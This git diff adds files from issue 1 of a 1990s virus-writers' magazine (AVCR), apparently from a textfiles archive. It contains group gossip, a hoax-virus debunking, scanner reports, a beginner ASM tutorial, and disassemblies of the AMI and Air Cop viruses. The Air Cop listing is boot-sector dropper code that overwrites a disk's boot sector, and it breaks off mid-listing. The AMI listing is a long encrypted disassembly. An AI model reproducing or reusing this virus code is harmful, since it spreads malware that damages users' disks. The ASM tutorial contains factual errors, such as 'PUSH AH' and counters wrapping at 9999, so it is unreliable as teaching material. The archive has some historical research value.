up +>to [NuKE]'s great standards. What this does is degrade [NuKE], for +>insignificant varients of insignificant boot viruses that do nothing suddenly +>say [NuKE] on them, which is enough to sicken anyone. +> The next question is, "how to stop the violence?" There is no easy +>answer to that, if you want to go about it in a decent way, but since I am +>not a decent person I would suggest just dropping the less experienced users +>from the group. +> Now I need to praise [NuKE] so they don't kill me ! [NuKE] IS a +>GREAT virus group with few flaws. This is one of their bigger flaws, though, +>since you can't have people saying that they are in a group, yet know nothing +>about what the group is doing! +> Written By: +> Thimble + Well, after reading this garbage I am wondering why somebody +named Thimble would even upload this to the AVCR Magazine section. I +would normally not use this crap in the magazine, but I would like to +comment on this. First of all, NuKE has only a handfull of members, I +don't know where this guy got the idea that NuKE was "GIANT," but I think +that before people write to just get their names in places they should +understand the subject that they are writing on. Second of all, NuKE +has only a few "not so great" viruses out, there are no screw-ups trying +to make shitty viruses in NuKE, doesn't look like this guy knows anything +about viruses. + + diff --git a/textfiles.com/virus/avcr-01.004 b/textfiles.com/virus/avcr-01.004 new file mode 100644 index 00000000..2b7504f4 --- /dev/null +++ b/textfiles.com/virus/avcr-01.004 @@ -0,0 +1,71 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + The Whore Virus + I have recently researched a virus called the Whore. I was told +that this virus was very stealthy, and neither normal nor heuristics scanners +could detect it. This brought about a challenge, thus I decided to research +it. + Patricia Hoffman's VSUM had no information about this virus, and as +claimed, no virus detector could detect this virus. I found only one magazine +that had ANY information on the Whore. SPAM (Sociopathic Programmers Against +McAfee) magazine claimed that the Whore was: "...Incredibly stealthy...it +utilizes the new anti-integrity master code. It's a combination boot/file +infector, infecting .COM, .EXE and .SYS files of over 20k." It also said that +"...if anyone wants a copy of this, you can get it on any SPaM board." + I got a copy of the Whore virus, and upon disassembly of it, and a +clean DOS 5.0 COMMAND.COM, I realized that there is absolutely NO difference +between the Whore "virus" and the clean COMMAND.COM. + Gee, I wonder which great virus creator wrote this one, it's ever +so stealthy ! + Master of Illusion + +Editor's Note: + Upon re-studying the virus and the DOS 5.0 COMMAND.COM and using +our File Compare, I found the following differences: +----------------------------------------------------------------------------- +; FILE CREATED BY FILE COMPARE, +; DEVELOPED BY: +; MICRO PROFESSOR SOFTWARE, +; AMATEUR VIRUS CREATION & RESEARCH GROUP. + + +;---------------------------------------------------------------------------- +var1_0 db 20h +var1_0 db 76h +;---------------------------------------------------------------------------- +var1_1 dd 18C018Ah +var1_1 dd 20202020h +;---------------------------------------------------------------------------- + dd 57000000h + dd 2C495320h +;---------------------------------------------------------------------------- + dd 0BBF14E49h + dd 0BBF13038h +;---------------------------------------------------------------------------- + + There were other differences, but they were insignificant +differences with the comments left by the disassembler. These may or may +not be significant. Due to the size of the WHORE virus, and its disassembly +I can not include it in this file, for it is approximately 700,000 bytes +long, and the virus is 47,845 bytes long, the same size as the DOS 5.0 +COMMAND.COM + Th Patron diff --git a/textfiles.com/virus/avcr-01.005 b/textfiles.com/virus/avcr-01.005 new file mode 100644 index 00000000..6f0f6bec --- /dev/null +++ b/textfiles.com/virus/avcr-01.005 @@ -0,0 +1,647 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + Researched By MAS + +Name: The AMI Virus + +Alias: NONE + +Type of Code: Unknown, but probably memory resident. + +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported AMI.COM as: "probably infected by an +unknown virus. +No checksum / recovery information (Anti-Vir.Dat) available. +Suspicious file access. Might be able to infect a file. +Suspicious Memory Allocation. The program uses a non-standard +way to search for, and/or allocate memory. +Found a code decryption routine or debugger trap. This is common +for viruses but also for some copy-protected software. +The program traps the loading of software. Might be a +virus that intercepts program load to infect the software. +Memory resident code. The program might stay resident in memory. +Garbage instructions. Contains code that seems to have no purpose +other than encryption or avoiding recognition by virus scanners. +Undocumented interrupt/DOS call. The program might be just tricky +but can also be a virus using a non-standard way to detect itself. +EXE/COM determination. The program tries to check whether a file +is a COM or EXE file. Viruses need to do this to infect a program. +Found code that can be used to overwrite/move a program in memory. +Found instructions which require a 80186 processor or above. +Encountered instructions which are not likely to be generated by +an assembler, but by some code generator like a polymorphic virus." + +(2) +Frisk Software's F-Protect (F-PROT) reported AMI.COM as: +"C:\AMI\AMI.COM seems to be infected with a virus. +Please contact Frisk Software International to check if this is a known +false alarm or send us a copy for analysis." + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) did not detect the AMI virus. + +(4) +MicroSoft Anti Virus (MSAV.EXE) did not detect the AMI virus. + +Execution Results: + This virus is very stealthy, for no files are changed in size date or +time stamp. Memory size does not change. The virus's size, date, and time +before execution were: + + NAME SIZE DATE TIME +AMI.COM 1703 12-16-93 2:40p + + And after execution they remained unchanged. The only noticible +difference between before execution and after execution is the change in +its code. Below is a comparison of the AMI virus before and after execution, +the top is before execution and the bottom is after execution. +_____________________________________________________________________________ +; FILE CREATED BY FILE COMPARE, +; DEVELOPED BY: +; MICRO PROFESSOR SOFTWARE, +; ALONG WITH AMATEUR VIRUS CREATION & RESEARCH GROUP. + + +;---------------------------------------------------------------------------- + mov SI,Word Ptr var1_100 ; [602D:0100] = 0 + mov SI,Word Ptr var1_100 ; [6342:0100] = 0 +;---------------------------------------------------------------------------- + xor Word Ptr var1_100,SI ; [602D:0100] = 0 + xor Word Ptr var1_100,SI ; [6342:0100] = 0 +;---------------------------------------------------------------------------- + add DL,Byte Ptr var1_2ee ; [602D:02EE] = 0F27Fh + add DL,Byte Ptr var1_2ee ; [6342:02EE] = 0F27Fh +;---------------------------------------------------------------------------- + mov AL,Byte Ptr DS:data_8ee2; [602D:8EE2] = 0 + mov AL,Byte Ptr DS:data_8ee2; [6342:8EE2] = 6399h +;---------------------------------------------------------------------------- + mov AL,Byte Ptr DS:data_792e; [602D:792E] = 0 + mov AL,Byte Ptr DS:data_792e; [6342:792E] = 69A9h +;---------------------------------------------------------------------------- + sbb Byte Ptr DS:data_461f,BL; [602D:461F] = 0 Subtract with borrow + sbb Byte Ptr DS:data_461f,BL; [6342:461F] = 1A1Ah Subtract with borrow +;---------------------------------------------------------------------------- + mov AX,Word Ptr DS:data_5f12; [602D:5F12] = 0 + mov AX,Word Ptr DS:data_5f12; [6342:5F12] = 53F8h +;---------------------------------------------------------------------------- + db 16h, 0A7h, 58h, 63h + db 16h, 0A7h +;---------------------------------------------------------------------------- +CODE_SEG_1 ends +var1_7a5 db 58h, 63h +;---------------------------------------------------------------------------- + +CODE_SEG_1 ends +;---------------------------------------------------------------------------- + end start + +;---------------------------------------------------------------------------- + + end start +;---------------------------------------------------------------------------- +; END OF FIRST FILE, EXTRA CODE IS FROM SECOND FILE + + +Cleaning Recommendations: + Remove from memory and delete infected files. + +Researcher's Notes: + The AMI virus is very stealthy, for there are no ways, other than +a virus detector, to notice the virus. When the virus is first run there +is no way to realize that it has been run, for there is no character +displaying, speaker noise, etc. + + +----------------------------------------------------------------------------- + Disassembly of the AMI Virus BEFORE Execution +----------------------------------------------------------------------------- + PAGE 60,132 + + +data_10be = 10BEh +data_16d6 = 16D6h +data_2041 = 2041h +data_2b9f = 2B9Fh +data_2ee0 = 2EE0h +data_461f = 461Fh +data_50ee = 50EEh +data_5d91 = 5D91h +data_5f12 = 5F12h +data_681b = 681Bh +data_7162 = 7162h +data_732e = 732Eh +data_7606 = 7606h +data_792e = 792Eh +data_8ee2 = 8EE2h +data_a1ed = 0A1EDh +data_aea5 = 0AEA5h +data_b400 = 0B400h +data_d8db = 0D8DBh +data_ee10 = 0EE10h +data_eeb8 = 0EEB8h +data_faa6 = 0FAA6h + + +; CODE_SEG_1 + +CODE_SEG_1 segment para public + assume CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1 + + + org 100h + + +; +; +; ENTRY POINT +; +; + + +; +; +; PROCEDURE proc_start +; +; + +proc_start proc far +start: ; N-Ref=0 + add Byte Ptr [BX+SI],AL + add DL,BH + nop ; No operation + nop ; No operation + call near ptr proc_2 +proc_start endp + + + +; +; +; PROCEDURE proc_2 +; +; + +proc_2 proc far + pop BX + sub BX,offset var1_131 + mov SI,Word Ptr var1_100 ; [602D:0100] = 0 + xor Word Ptr var1_100,SI ; [602D:0100] = 0 + lea DI,Word Ptr var1_14d[BX]; Load effective address + mov SI,682h + xor Word Ptr [DI],DI + xor Word Ptr [DI],SI + inc DI + dec SI + jne loc_notfound ; Jump if not equal ( != ) + aaa ; ASCII adjust for addition + xor Byte Ptr [BP+DI+1Fh],CL + + dw 50C0h, 0C951h +var1_12d db 'XPP' + db 8Dh +var1_131 db '`@@@' + db 13h, 0BFh, 40h, 0A0h, 4Ch, 53h + db 0C3h, 57h, 15h, 44h, 18h +var1_140 db '" ' + db 0 +var1_144 db 20h, 9, 3Ah, 0DBh, 7Eh, 79h + db 14h, 0CAh, 16h +var1_14d dw 1110h, 10h, 0E9h + db 5 dup (0) + dw 1810h + db 4 dup (10h) + db 32h, 11h, 3, 26h, 3 +var1_163 db '& ! ' + db 0Ch, 0BFh + db ']PPPPB@A@@TTTT' + db 0B8h, 50h, 50h, 0Bh, 0D1h, 0BBh + db 0F3h, 51h, 8Eh, 2Ch, 2Fh, 0F4h + db 0A1h, 8Eh, 29h, 27h, 0C6h, 91h + db 0BEh, 1Bh, 17h, 0C8h, 91h, 33h + db 80h, 81h, 0AEh, 0Ah, 7, 0DAh + db 81h, 22h, 92h, 91h, 0C3h, 24h + db 0A0h, 5Dh, 0B1h, 0CBh, 9Ch, 0A2h + db 0D2h, 0B1h, 18h, 5Fh, 0EBh, 93h + db 0AFh, 60h, 0A5h, 9Eh, 72h, 6Eh + db 1Bh, 7, 16h +var1_1b1 db '6L1U' + db 0B8h +var1_1b6 db ']D}' + db 0D8h, 0D4h, 5, 52h, 7Dh, 0ACh + db 0FCh +var1_1c0 db 71h, 22h, 70h +loc_1: ; N-Ref=0 + wait ; Wait for interrupt + add DL,Byte Ptr var1_2ee ; [602D:02EE] = 0F27Fh + cbw ; Convert byte to word + ror Byte Ptr [BX+SI+3Dh],1 ; Rotate right + call far ptr proc_1 + pop Word Ptr var1_260[SI] + mov BX,0FCF5h + and CH,AH + adc AX,9D0Dh ; ADD with carry + retf ; Return FAR +proc_2 endp + + + + db 92h +var1_1df db '.bnV/' + db 0A2h +var1_1e5 db '^!j' + db 7Fh +var1_1e9 db '&VLT' + db 0B8h, 95h, 0C3h, 5Ch +loc_2: ; N-Ref=1 + inc SP + rcl BX,CL ; Rotate left through carry + rcl BX,CL ; Rotate left through carry + rcl BX,CL ; Rotate left through carry + retn + + db 5 dup (0C3h) + dw 28EBh, 2CA3h, 0ED6Dh, 652Eh + dw 2B8Eh, 86A6h, 0B690h, 0A619h + dw 9091h, 0BA6h, 8396h, 0A680h + dw 8323h, 0B690h, 9656h, 9090h + dw 0BBDDh, 0EA70h, 0A3E5h, 0E548h + dw 652Eh, 0E403h, 0DB00h, 9D8Dh + dw 0B71h, 0BF73h, 5746h, 0CD17h + dw 8EFFh, 0DB57h, 0E9A7h, 56F5h + dw 0A3ADh, 2684h, 0AFADh +var1_244 db 'P"q' + db 0EBh, 3Eh, 9Ch, 9Fh, 44h, 11h + db 9Dh, 9Fh, 3Ah, 1, 0F3h, 0A4h + db 2Eh, 8Ch, 0Eh, 36h, 0, 5Dh + db 9Eh, 0D5h, 36h, 99h, 6, 13h + db 10h +var1_260 dw 0E606h +var1_262 db '& z' + db 6, 0ACh +var1_268 db '^QP' + db 15h, 0DEh +loc_3: ; N-Ref=0 + xchg BP,AX + dec SI + push DI + dec SI + pop DI + int 0F7h + + dw 416Ah, 40FFh, 0E951h, 56F5h + dw 0A3ACh, 56F4h, 0A62Dh, 0A224h + dw 6BF0h, 678Eh, 0BC96h, 9090h + dw 0BE90h, 9E1Ch, 8096h, 0D9Eh + dw 9C96h, 8E83h, 288Fh, 0B5B1h + dw 0B15Dh, 248Fh, 1ABAh, 0A020h + dw 816Dh +var1_2a6 db 'HSQ' + db 0E5h, 7Bh, 9Ch, 70h, 0D0h, 0A8h + db 95h +var1_2b0 db 'F6$5k' + db 0C0h, 0B8h, 0FDh, 56h, 24h, 0Ch + db 4Fh, 0E9h, 79h, 64h, 9Ch, 0 + db 0Fh, 0A8h, 3Fh, 1Ah, 20h, 0Fh + db 0ADh, 17h, 2Ch, 10h, 0A9h, 39h + db 34h, 0ABh, 33h, 6, 0Fh, 1Eh + db 0CCh, 20h, 1Eh, 2Fh, 81h, 1Fh + db 46h, 10h, 19h, 0FAh, 17h, 81h + db 91h, 0DFh, 2Bh, 53h, 15h, 0C9h + db 5Ch, 23h, 99h, 49h, 44h, 0B9h + db 0D5h, 50h, 11h +var1_2ee db 7Fh, 0F2h, 1Fh, 40h, 6Fh, 0E2h +var1_2f4 db '!@o' + db 86h +var1_2f8 db 'W5PPQ' + db 0E9h +var1_2fe db 'Mdl' + db 81h, 8Eh, 29h, 0BEh, 93h, 0A1h + db 8Eh, 1Ch, 96h, 0A5h, 91h, 8Eh + db 28h, 8Ch, 0B5h, 3Ah, 3Dh, 86h + db 8Eh, 9Fh, 4Dh, 0A1h, 9Fh + db '+Foy' + db 7, 6Eh, 10h, 6Ch, 0EBh, 0D4h + db 0B0h, 8Eh, 5Fh, 8Eh, 97h, 0A1h + db 0EFh, 18h, 4, 7Eh, 94h +var1_32d db 'VgQ' + db 0CCh, 8Ah, 8Fh, 7Ch, 0BFh, 34h + db 0B1h +var1_337 db '|P%' + db 0B8h, 0CCh, 0, 3, 1, 2 +var1_340 db 'vwu&>' + db 0Eh, 0A9h, 36h, 57h, 11h, 3Eh + db 9Ch, 0Eh, 59h, 11h, 1Eh, 7 + db 0B8h, 0, 3Dh, 0CDh +var1_355 db '!rV' + db 9Bh, 0C8h, 0A8h, 10h, 47h, 0DDh + db 31h, 3Eh, 0A9h +var1_361 db '6c!' + db 0Eh, 0A9h +var1_366 db '.eQ' + db 0E4h +loc_4: ; N-Ref=0 + +var1_36a db 'o^O' + db 0EAh, 7Eh, 51h, 0F9h, 43h, 40h + db 8Dh +var1_374 db 'a2w{' + db 91h, 25h, 63h, 0E8h, 52h, 12h + db 63h, 99h, 93h, 72h, 6Dh, 81h + db 8Eh, 3, 0EBh, 0A1h, 0BEh, 19h + db 86h, 0DDh, 91h, 24h, 0AEh, 5Dh + db 0A1h, 0AEh, 1, 0BEh, 0AEh, 81h + db 0CDh, 0DAh, 0E5h, 93h, 79h, 57h + db 90h, 0BEh, 13h, 0AEh, 0EDh, 0A1h + db 0A0h, 0D7h, 0A9h, 8Eh, 21h, 9Eh + db 1Bh, 56h, 6Ch, 0AEh, 21h, 54h + db 0BEh, 0E4h, 47h, 69h, 0C7h +var1_3b3 db 'yiF' + db 0AEh +var1_3b7 db 32h, 59h +loc_5: ; N-Ref=0 + jns loc_notfound ; Jump if no sign ( >= 0) + sbb AL,56h ; 'V' Subtract with borrow + push DX + push CS + scasb ; Scan DS:SI for byte in AL + or Word Ptr [SI],BX + and Word Ptr [BX+SI],CX + + dw 5326h, 9FC0h, 5417h, 0D239h + dw 5001h, 0DA16h, 7526h, 29DCh + dw 98Eh, 646h, 0E697h, 0E137h + dw 30D6h, 1E63h, 269Fh, 1464h + dw 0EAEEh, 5506h, 0EF92h, 6A55h + db 9Ah, 76h, 25h, 0E9h, 0CCh, 9Fh + db 0FFh +loc_6: ; N-Ref=1 + inc BP + add AX,8E74h + je loc_notfound ; Jump if equal ( = ) + call far ptr loc_notfound + and AL,4Fh ; 'O' + pop DS + mov AL,Byte Ptr DS:data_8ee2; [602D:8EE2] = 0 + sub BP,Word Ptr [BP-5E13h] + mov SI,861Bh + esc Byte Ptr [BP+5D91h] + mov CL,24h ; '$' + + dw 0B3C0h, 4D49h, 6BA1h, 10A1h + dw 9028h, 0A3D2h, 0A359h, 5D42h + dw 0D281h, 8EB5h, 0EB01h, 0A5A1h + dw 0AFAEh, 0F37Eh, 5100h, 10E4h + dw 0FFAh, 0F941h, 4043h, 618Dh + dw 51E8h, 7E07h, 46DBh, 5113h + dw 0AB0Eh +var1_442 db '.e!' + db 0EDh, 1, 94h, 2Eh, 0DDh, 31h + db 3Eh, 9Bh, 1Eh, 51h, 11h, 0F6h + db 0C1h, 7, 75h, 5, 0F6h, 0C1h + db 20h, 65h, 1Ah, 0A8h, 11h, 53h + db 3Eh, 0D5h, 6, 67h, 21h, 0EDh + db 1 +var1_464 db '?''}' + db 7Fh, 0Eh, 0Ah, 9, 0Bh, 8 + db 0CDh, 0B9h, 0E2h, 0BEh +var1_471 db '^N_' + db 13h, 11h, 12h, 10h, 0E9h, 57h + db 50h, 0EBh, 24h, 51h, 0AFh, 67h + db 2Bh, 0E7h, 5Eh, 0B1h, 0A7h, 0EBh + db 0EBh, 42h, 67h, 0C8h, 81h, 97h + db 1Bh, 87h, 0C8h, 9Bh, 40h, 0F4h + db 82h, 77h, 62h, 0Bh, 42h, 0DAh + db 0C9h, 0CBh, 8Fh, 53h, 8Eh, 96h + db 0C6h, 0C7h, 0F1h +loc_7: ; N-Ref=0 + scasb ; Scan DS:SI for byte in AL + cmpsw ; Cmp word at DS:SI to ES:DI + sbb AX,SP ; Subtract with borrow + mov AL,Byte Ptr DS:data_792e; [602D:792E] = 0 + out DX,AX ; Output to port [DX] from AX + aaa ; ASCII adjust for addition + push AX + out DX,AX ; Output to port [DX] from AX + cmp AX,0E851h + pop CX + inc CX + mov BP,0E4B2h + sbb Byte Ptr DS:data_461f,BL; [602D:461F] = 0 Subtract with borrow + dec SI + xchg DX,AX + pop ES + +; + assume ES:nothing +; + + dec DI + add BX,BX + xchg DI,AX + cmpsw ; Cmp word at DS:SI to ES:DI + pop ES + jnb loc_notfound ; Jump if not below ( >= ) + xchg DI,AX + and Word Ptr [BP+SI],SP + jcxz loc_notfound ; Jump if CX = 0 + + dw 12F1h, 4B17h, 9A10h, 0E7E1h + dw 5507h, 0FE00h, 1F8Fh, 59h + dw 365h, 0CBABh, 0EB12h, 0B9FDh +var1_4e0 db ')T(' + db 89h, 20h, 54h, 0D6h, 0CDh, 0F9h + db 50h, 25h, 0AAh, 0FCh, 0AAh, 0Bh + db 4Eh, 1Fh, 82h, 16h, 47h, 13h + db 12h, 0CAh, 99h, 0DBh, 97h, 0A7h + db 77h, 3, 50h, 0E7h, 51h, 0A2h + db 'bq@' + db 0A3h, 0A6h, 0FAh, 0A1h, 1Bh, 68h + db 66h, 96h, 0C4h, 91h, 6Fh, 1Eh + db 86h, 0D8h, 81h, 0F4h, 92h, 3Ah + db 5Ah, 83h +var1_518 db 'j|8' + db 98h, 0E5h, 99h, 38h, 91h, 0D5h + db 57h, 4Ch, 8, 0A1h, 0D4h, 5Bh + db 2Bh, 93h, 0FAh, 0ABh, 0Bh, 0Ah + db 57h, 0Fh, 93h, 11h, 11h, 0CBh + db 4Eh, 1Ch, 41h, 0A2h, 0BEh, 9 + db 0B2h, 0A6h +loc_8: ; N-Ref=0 + or Word Ptr data_b400[BP+DI],DX + xor Word Ptr [SI],DX + and AL,Byte Ptr [SI] + esc Byte Ptr [SI] + mov Byte Ptr [BX+DI+78h],0E3h + sub AL,10h + + dw 1A64h +var1_54c db ',0d' + db 16h, 3Ch, 0FFh, 74h, 2, 0F8h + db 0C3h, 0F9h, 0C3h, 2Ch, 0A0h, 62h + db 16h, 2Ch, 0CFh, 67h, 12h, 0D9h + db 0E3h, 0D8h, 0E3h, 3Eh, 98h, 60h + db 20h, 0DEh, 88h, 0ABh, 0F1h +var1_56c db '' + db 0EFh, 3Eh, 2Bh, 11h, 16h, 43h + db 0B4h, 48h, 0BBh, 6Bh, 0, 0CDh +var1_756 db '![c' + db 13h, 0E9h, 17h, 0D3h, 3Eh, 0D6h + db 16h + db ' !!' + db 0AEh, 0E0h, 2Eh, 3Fh, 13h, 0AFh + db 0EEh, 50h, 51h, 0E9h, 0F5h, 56h + db 0ACh, 0B3h, 0E4h, 0FFh, 63h, 40h + db 0FEh +var1_776 db 'cASf' + db 1Bh, 51h, 0E9h, 0D2h, 56h, 76h + db 91h, 95h, 86h, 91h, 0ADh, 0E7h + db 0E6h, 42h, 66h, 1Eh, 48h, 24h + db 0D0h, 0A3h +var1_78e db 'B)%' + db 86h, 4Dh, 0A1h, 1Ch, 0D0h, 34h + db 0C9h, 5Dh, 0B1h, 0C8h, 0Dh, 9Eh + db 8Fh, 0E2h, 2Ah, 9Bh, 61h, 0D5h + db 16h, 0A7h, 58h, 63h +CODE_SEG_1 ends + + + + end start + + + diff --git a/textfiles.com/virus/avcr-01.006 b/textfiles.com/virus/avcr-01.006 new file mode 100644 index 00000000..5678fd8f --- /dev/null +++ b/textfiles.com/virus/avcr-01.006 @@ -0,0 +1,161 @@ + + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + An introduction to ASM + +THE BASE OF 10 + When most people see the number 10 they think of ten, or X. This +is because we are not computers, and we like small numbers. In our numbering +system, to go from 1 to 10 we multiply by 10, and to go from 10 to 100 we +multiply by ten again, refer to the chart below: + 1 10 100 1000 10000 + 1 *10 *10 *10 *10 + +THE BASE OF 2 + Your microprocessor has around 12 psudomemory locations which can +store a number, called a register. Each register contains a high, and a +low portion, each having an 8 bit capacity, thus you could have up to 24 8 +bit memory locations if you do not need the whole register's memory capacity. +The register has either an on (true) or an off (false), and because of this +we can not have the luxury of a number higher than 1, for 0 is false and 1 +is true. Each person has to work with 0's and 1's to make every number +imaginable! + The art of converting 1's and 0's into recognizable numbers and +working with these numbers is called binary arithmatic. Before we delve +into binary arithmatic lets look something more familiar: + + Base --> 10 <-- Exponent + + We look at numbers with a BASE of 10, while binary arithmitic +looks at numbers with a base of 2: + + 128 64 32 16 8 4 2 1 + +BASED on 2--> 2^7 2^6 2^5 2^4 2^3 2^2 2^1 2^0 + + Keeping the above in mind, lets count to ten in binary arithmatic, +and a more familiar base 10 arithmatic: + + 0 = 0000 + 1 = 0001 + 2 = 0010 + 3 = 0011 + 4 = 0100 + 5 = 0101 + 6 = 0110 + 7 = 0111 + 8 = 1000 + 9 = 1001 + 10 = 1010 + + Are we excited yet? Well if not, then you will be soon, because +now we are going to operate with binary numbers: + + Lets add 2 and 3 in base 10 and binary: + 1 + 2 0010 + +3 +0011 + --- ------ + 5 0101 + + Confused yet? Well lets take this step by step. To add 0010 (2) +and 0011 (3) we need to add up the digits as we would in base 10. 1+0 is +1, and we make a 1 in binary with 0001, easy. Now, lets take 1+1=2, how +do we make a two in binary? A two in binary is 0010, so the last number +goes in the answer space, and the 1 is carried. 1+0+0=1 and a 1 in binary +is 0001, so just a 1 is needed. Finally 0+0 in binary is 0000 so a 0 is +needed. Thats not so hard, is it? + Alright, now we must subtract numbers in binary. Lets take 3 and 2: + + 3 0011 + -2 -0010 + --- ------ + 1 0001 + + Nice and easy, you deserve a break after the adding , so the +subtracting is exactly the opposite of adding, not much to learn! + +INCREMENT \ DECREMENT + To increment something is to add 1 to it, so if we increment the +base 10 number 3 we get 4, much the same way, if we increment the binary +number 0011 we get 0100. The ASM instruction to increment is: + INC # + # could be a binary number, but it also could be a register. If +the number 0001 is stored in the AH register then "INC AH" would store +0010 in the AH register. + To decrement something is to subtract 1 from it, so if we decrement +the base 10 number 3 we get 2, much the same way, if we increment the binary +number 0011 we get 0010. The decrement syntax is: + DEC # + The processor can only increment to the # 9999, and then it goes back +to 0000, BUT a flag is set explaining that we are not at 0000 but rather at +10,000d (I would rather not figure out how to write 10,000 in binary so I +just put a d after it to indicate decimal, that is a valid ASM argument)! + +MOV IN ALL ITS GLORY: + The MOV statement moves a number from the register to memory, or +from the memory to a register, or even within each. The syntax for the +MOV statement is: + + MOV dest,source + + Thus, if I type "MOV AX,BX" the processor will move the contents +of the BX register into the AX register. If I type "MOV [AX],BX" then the +processor will move what is in the BX register into the number location +in your RAM corisponding to the number in the AX register. + +INT IT THE EASY WAY: + The INT argument calls a dos software interrupt or a hardware +interrupt, but lets first talk about the software interrupt. A software +interrupt is very similar to a subroutine, in that the program is written +for you, and you only have to put in the information explaining where +everything is. The syntax for the INT argument is: + INT # + Lets take an example, we will park the hard disk heads using a dos +software interrupt: + + MOV AH,19h ; puts 19 hexidecimal in the AH (A high) register. + MOV DL,80h ; puts 80 hexidecimal in the DL (D low) register. + INT 13h ; calls the interrupt + + See how easy it is to use software interrupts? Each interrupt has +its own command set, so you need to get a list of interrupts, and what +arguments you need in which registers. + +PUSH AND POP: + The PUSH statement pushes a register into memory and the POP +statement pops it back into the register: + + PUSH AH + MOV AH,19h + MOV DL,80h + INT 13h + POP AH + + This simple program saves the AH register, then it parks the heads, +and lastly it restores the AH register. + + This is the end of issue one of an Introduction to ASM, in our +next issue we will discuss the functions of all of the ASM codes, and +explain hardware interrupts, and MUCH more, so look for the next issue +of AVCR Magazine and look for AVCR-01.006! + Written By: + Th Patron diff --git a/textfiles.com/virus/avcr-01.007 b/textfiles.com/virus/avcr-01.007 new file mode 100644 index 00000000..9943602b --- /dev/null +++ b/textfiles.com/virus/avcr-01.007 @@ -0,0 +1,509 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + Research of the Air Cop Virus + by + Security Threat +Name of Virus: Air Cop +----------------------------------------------------------------------------- +Alias: Air Dropper +----------------------------------------------------------------------------- +Type Of Code: Not Informed +----------------------------------------------------------------------------- +VSUM Information - Resident boot +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported aircop.com as dropper2 virus + +(2) +Frisk Software's F-Protect (F-PROT) reported aircop.com as Air Dropper + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported aircop.com as Dropper virus + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported aircop.com as Dropper +----------------------------------------------------------------------------- +Execution Results: It is a resident boot virus and it installs itself into +C:\ giving you an error saying "Non-system disk please replace and hit enter" +----------------------------------------------------------------------------- +Cleaning Recommendations: Cleaning is impossible but to rid your machine of +the virus a boot off of a boot disk is needed and if drive C: can be acessed +it must be reformatted. +----------------------------------------------------------------------------- +Researcher's Notes: Reads "STACK!" many times over and gives a warning line +then states that the virus is written by RABID development Corp. + +----------------------------------------------------------------------------- + Disassembly of the AirCop Virus +----------------------------------------------------------------------------- + +PAGE 59,132 + +;========================================================================== +;== == +;== AIRCOP == +;== == +;== Created: 11-Jan-91 == +;== Version: == +;== Passes: 5 Analysis Options on: ABFMNOPU == +;== == +;== == +;========================================================================== + +movseg macro reg16, unused, Imm16 ; Fixup for Assembler + ifidn , + db 0BBh + endif + ifidn , + db 0B9h + endif + ifidn , + db 0BAh + endif + ifidn , + db 0BEh + endif + ifidn , + db 0BFh + endif + ifidn , + db 0BDh + endif + ifidn , + db 0BCh + endif + ifidn , + db 0BBH + endif + ifidn , + db 0B9H + endif + ifidn , + db 0BAH + endif + ifidn , + db 0BEH + endif + ifidn , + db 0BFH + endif + ifidn , + db 0BDH + endif + ifidn , + db 0BCH + endif + dw seg Imm16 +endm +keybd_q_head EQU 1AH ; (0040:001A=2CH) +keybd_q_tail EQU 1CH ; (0040:001C=2CH) + +SEG_A SEGMENT BYTE PUBLIC + ASSUME CS:SEG_A, DS:SEG_A + + + ORG 100h + +AIRCOP PROC FAR + +START: + MOV AX,CS + MOV DS,AX + MOV SP,3B6H + MOV AH,0 + MOV AL,3 + INT 10H ; Video display ah=functn 00h + ; set display mode in al + MOV DX,52BH + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV DX,3C3H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV DX,4E5H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV DX,464H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV DX,480H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,40H + MOV ES,AX + PUSH WORD PTR ES:keybd_q_tail ; (0040:001C=2CH) + POP WORD PTR ES:keybd_q_head ; (0040:001A=2CH) + MOV AX,CS + MOV ES,AX + MOV AH,8 + INT 21H ; DOS Services ah=function 08h + ; get keybd char al, no echo + MOV CX,3 + +LOCLOOP_1: + PUSH CX + MOV AX,201H + MOV BX,5D0H + MOV CX,1 + MOV DX,0 + INT 13H ; Disk dl=drive a ah=func 02h + ; read sectors to memory es:bx + POP CX + JNC LOC_2 ; Jump if carry=0 + LOOP LOCLOOP_1 ; Loop if cx > 0 + + MOV DX,4F2H + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,4CFFH + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code +LOC_2: + MOV CX,3 + +LOCLOOP_3: + PUSH CX + MOV AX,301H + MOV BX,5D0H + MOV CX,2709H + MOV DX,100H + INT 13H ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + POP CX + JNC LOC_4 ; Jump if carry=0 + LOOP LOCLOOP_3 ; Loop if cx > 0 + + MOV DX,50EH + MOV AH,9 + INT 21H ; DOS Services ah=function 09h + ; display char string at ds:dx + MOV AX,4CFFH + INT 21H ; DOS Services ah=function 4Ch + ; terminate with al=return code +LOC_4: + MOV CX,3 + +LOCLOOP_5: + PUSH CX + MOV AX,301H + MOV BX,7D0H + MOV CX,1 + MOV DX,0 + INT 13H ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + POP CX +;* JNC LOC_6 ;*Jump if carry=0 + DB 73H, 0EH + LOOP LOCLOOP_5 ; Loop if cx > 0 + + MOV DX,57CH + MOV AH,9 +DATA_1 DD 0FFB821CDH +DATA_2 DD 0BA21CD4CH + DB 0E5H, 